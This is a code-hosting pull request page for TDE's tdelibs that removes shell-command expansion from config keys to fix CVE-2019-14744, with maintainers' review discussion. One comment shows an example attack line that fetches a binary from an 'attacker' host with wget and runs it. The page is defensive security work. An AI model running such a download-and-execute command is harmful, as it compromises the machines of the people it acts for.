TDE
/
tdelibs
7
1
Fork 0
Κώδικας Ζητήματα 18 Pull Requests 7 Κυκλοφορίες Wiki Δραστηριότητα
Σήματα Ορόσημα

Security: remove support for $(...) in config keys with [$e] marker. #46

Συγχωνεύτηκαν χειροκίνητα
SlavekB συγχώνευσε 1 υποβολές από issue/45/CVE-2019-14744 σε master 5 έτη πριν
Συζήτηση 5 Υποβολές 1 Αρχεία Άλλαξαν 2
SlavekB σχολίασε 5 έτη πριν
Ιδιοκτήτης

Patch is based on KDE Frameworks 5 kconfig patch for CVE-2019-14744.

Patch is based on KDE Frameworks 5 kconfig patch for CVE-2019-14744.
SlavekB το πρόσθεσε στο R14.0.7 release ορόσημο 5 έτη πριν
SlavekB πρόσθεσε τη σήμανση SL/critical 5 έτη πριν
SlavekB πρόσθεσε μια νέα εξάρτηση 5 έτη πριν
#45 kde-kdesktopfile-command-injection
MicheleC σχολίασε 5 έτη πριν
Ιδιοκτήτης

Looks good to me

Looks good to me
sunjob σχολίασε 5 έτη πριν

The problem is not the availability of this functionality, but that it should be allowed only for trusted paths:

/usr/...
/usr/local/...
/etc/...
$XDG_CONFIG_HOME
etc

And instead of implementing it as it should, you just deleted this functionality now. Wow...

The problem is not the availability of this functionality, but that it should be allowed only for trusted paths: /usr/... /usr/local/... /etc/... $XDG_CONFIG_HOME etc And instead of implementing it as it should, you just deleted this functionality now. Wow...
SlavekB σχολίασε 5 έτη πριν
Συντάκτης
Ιδιοκτήτης

The problem is that simply reading a value causes some script to execute. Therefore, it is not a question of limiting to trusted paths. For example, there could be run regular /usr/bin/wget https://attacker/binary && chmod a+x binary && ./binary; echo "Have a nice day.". Or curl with sending information to a remote server,… Therefore removing it seems like a good idea. After all, we used the same solution as in the KDE world.

The problem is that simply reading a value causes some script to execute. Therefore, it is not a question of limiting to trusted paths. For example, there could be run *regular* `/usr/bin/wget https://attacker/binary && chmod a+x binary && ./binary; echo "Have a nice day."`. Or curl with sending information to a remote server,… Therefore removing it seems like a good idea. After all, we used the same solution as in the KDE world.
MicheleC σχολίασε 5 έτη πριν
Ιδιοκτήτης

I agree with Slavek's comment. It is basically impossible to make this feature safe in all cases if we keep it enabled. The simple example in Slavek's comment is quite emblematic.

Removal seems the only sensible way to go.

I agree with Slavek's comment. It is basically impossible to make this feature safe in all cases if we keep it enabled. The simple example in Slavek's comment is quite emblematic. Removal seems the only sensible way to go.
sunjob σχολίασε 5 έτη πριν

although maybe it’s better than having such a big hole :о)

although maybe it’s better than having such a big hole :о)
SlavekB έκλεισε αυτό το pull request 5 έτη πριν
SlavekB έκλεισε αυτό το pull request 5 έτη πριν
SlavekB διέγραψε το κλάδο issue/45/CVE-2019-14744 5 έτη πριν
Το pull request έχει συγχωνευθεί χειροκίνητα ως 1074eb0336.
Συνδεθείτε για να συμμετάσχετε σε αυτή τη συνομιλία.
Εξεταστές
Αίτηση επανεξέτασης
Δεν υπάρχουν εξεταστές
Σήματα
Εφαρμογή σημάτων
Καθαρισμός σημάτων
GE/need-info
General - need additional info from contributor PR/keep-branch
Pull request - do not delete branch after merging PR/not-ok
Pull request - need fixing PR/rfc
Pull request - request for comments PR/update-trans
Pull request - update to translation files needed PR/wip
Pull request - work in progress RS/R14.0.x
Related to R14.0.x series RS/R14.1.x
Related to R14.1.x series SL/critical
Severity level - critical SL/major
Severity level - major SL/minor
Severity level - minor SL/normal
Severity level - normal SL/regression
Severity level - regression from previous version SL/trivial
Severity level - trivial SL/wishlist
Severity level - wishlist request ST/duplicate
Status - duplicate of another issue ST/invalid
Status - invalid report ST/notourproblem
Status - not our problem ST/rejected
Status - rejected ST/wontfix
Status - won't fix ST/worksforme
Status - works for me, unable to reproduce
Χωρίς Σήμα GE/need-info PR/keep-branch PR/not-ok PR/rfc PR/update-trans PR/wip RS/R14.0.x RS/R14.1.x SL/critical SL/major SL/minor SL/normal SL/regression SL/trivial SL/wishlist ST/duplicate ST/invalid ST/notourproblem ST/rejected ST/wontfix ST/worksforme
Ορόσημο
Ορισμός ορόσημου
Καθαρισμός ορόσημου
Δεν υπάρχουν αντικείμενα
Χωρίς Ορόσημο
R14.0.7 release
Αποδέκτες
Ανάθεση χρηστών
Εκκαθάριση αποδεκτών
Χωρίς Αποδέκτη
3 Συμμετέχοντες
Ειδοποιήσεις
Ημερομηνία Παράδοσης

Δεν ορίστηκε ημερομηνία παράδοσης.

Μπλοκάρει
#45 kde-kdesktopfile-command-injection
TDE/tdelibs
Αναφορά: TDE/tdelibs#46
Σύνταξη Προεπισκόπηση
Φόρτωση…
Ακύρωση
Αποθήκευση
Δεν υπάρχει ακόμα περιεχόμενο.
Διαγραφή του Κλάδου 'issue/45/CVE-2019-14744'

Η διαγραφή του κλάδου είναι μόνιμη. ΔΕΝ ΜΠΟΡΕΙ να αναιρεθεί. Συνέχεια;

Όχι
Ναι